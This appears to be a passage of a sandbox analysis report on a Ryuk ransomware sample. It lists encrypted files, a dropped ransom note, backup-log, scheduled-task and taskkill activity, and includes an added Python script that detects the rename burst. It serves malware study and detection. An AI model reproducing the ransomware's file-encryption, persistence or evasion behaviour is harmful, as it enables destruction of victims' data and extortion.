File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-180.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\WT61FR.LEX.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_100_percent.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ur.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dummy.aff.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\AppStore_icon.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\catalog.json.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\it.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\vk_swiftshader_icd.json.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pt-PT.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA6\VBE6EXT.OLB.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ChronologicalResume.dotx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsym.ttf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Staging.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\nexturl.ort.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\lpklegal.txt.[[email protected]].RYKCRYPT C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
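The two tables above are the raw material for a file-event detection: one process rewrites files across unrelated software trees, every rewritten name carries the same marker (original name, a bracketed contact string, then .RYK), and a ransom note lands in C:\Windows. The script below is an added example, not part of the original report or of the sandbox that produced it. It parses rows in the layout used on this page, recovers the original file name from the Ryuk marker, and flags a process that rewrote marked files across several software roots or dropped the note. Its sample rows are copied from the tables above with two changes: the sample's long SHA256 file name is shortened to sample.exe, and the contact string inside the brackets, which the page shows only in obfuscated form, is replaced by the placeholder contact@example.invalid. The two notepad.exe rows are constructed to show the negative case.

```python
"""Ransomware rename-burst triage over sandbox-style file event rows.

Added example; not from the original report or any tool it names.
Row layout assumed: '<Description> <file path> <process path> <target>'.
The file path may contain spaces; the process path on this page never does,
so the path is matched lazily up to the next drive-letter token.
"""
import re
from collections import defaultdict

ROW_RE = re.compile(
    r"^(?P<desc>File opened for modification|File created|File opened \(read-only\))\s+"
    r"(?P<path>.+?)\s+(?P<proc>[A-Za-z]:\\\S+)\s+(?P<target>\S+)$"
)
# Ryuk naming seen on this page: <original name>.[<contact>].RYK
# Matched as a prefix rather than anchored at the end, because one row on the
# page ends in '.RYKCRYPT' instead of '.RYK' and should still be counted.
RYUK_MARKER_RE = re.compile(r"^(?P<orig>.+)\.\[(?P<contact>[^\]]+)\]\.RYK")
RANSOM_NOTE_NAMES = {"ryukreadme.txt"}  # note created under C:\Windows in the table above

SAMPLE_ROWS = [  # adapted from the report; sample.exe and the contact string are placeholders
    r"File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.[contact@example.invalid].RYK C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.[contact@example.invalid].RYK C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-180.png.[contact@example.invalid].RYK C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[contact@example.invalid].RYK C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac.[contact@example.invalid].RYK C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File opened for modification C:\Program Files\Microsoft Office\root\Office16\lpklegal.txt.[contact@example.invalid].RYKCRYPT C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A",
    r"File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A",
    # constructed benign rows (not from the report); the second has brackets but no marker
    r"File opened for modification C:\Users\Admin\Documents\notes.txt C:\Windows\system32\notepad.exe N/A",
    r"File created C:\Users\Admin\Documents\draft [v2].docx C:\Windows\system32\notepad.exe N/A",
]


def parse_row(row):
    """Split one report row into desc/path/proc/target, or None if it is not a file row."""
    m = ROW_RE.match(row)
    return m.groupdict() if m else None


def classify_path(path):
    """Return (kind, original_path, contact): kind is 'encrypted', 'note' or 'other'."""
    name = path.rsplit("\\", 1)[-1]
    if name.lower() in RANSOM_NOTE_NAMES:
        return "note", path, None
    m = RYUK_MARKER_RE.match(name)
    if m:  # strip the marker to get back the pre-encryption name
        return "encrypted", path[: len(path) - len(name)] + m.group("orig"), m.group("contact")
    return "other", path, None


def software_root(path, depth=2):
    """'C:\\Program Files (x86)\\Adobe\\...' -> 'C:\\Program Files (x86)\\Adobe'."""
    return "\\".join(path.split("\\")[: depth + 1])


def triage(rows, min_encrypted=3, min_roots=2):
    """Group events per process; flag a process that rewrote >= min_encrypted marked
    files across >= min_roots software roots, or that dropped a ransom note."""
    per_proc = defaultdict(lambda: {"enc": [], "roots": set(), "contacts": set(),
                                    "notes": [], "other": 0, "exts": defaultdict(int)})
    for row in rows:
        ev = parse_row(row)
        if ev is None:
            continue
        kind, orig, contact = classify_path(ev["path"])
        st = per_proc[ev["proc"]]
        if kind == "encrypted":
            st["enc"].append(orig)
            st["roots"].add(software_root(orig))
            st["contacts"].add(contact)
            base = orig.rsplit("\\", 1)[-1]
            st["exts"][base.rsplit(".", 1)[-1].lower() if "." in base else "(none)"] += 1
        elif kind == "note":
            st["notes"].append(orig)
        else:
            st["other"] += 1
    return {
        proc: {
            "flagged": (len(st["enc"]) >= min_encrypted and len(st["roots"]) >= min_roots) or bool(st["notes"]),
            "encrypted_files": len(st["enc"]),
            "software_roots": sorted(st["roots"]),
            "contacts": sorted(st["contacts"]),
            "ransom_notes": st["notes"],
            "top_extensions": sorted(st["exts"].items(), key=lambda kv: -kv[1])[:5],
        }
        for proc, st in per_proc.items()
    }


if __name__ == "__main__":
    for proc, verdict in triage(SAMPLE_ROWS).items():
        print(("FLAGGED " if verdict["flagged"] else "clean   ") + proc, verdict)
```

The thresholds are deliberately low for a sandbox run; on an endpoint the same logic would be applied per process over a short time window, and the recovered original extensions (.js, .jar, .png, .txt) show that this sample does not filter by file type, which is why a canary file in any directory would have caught it.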

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
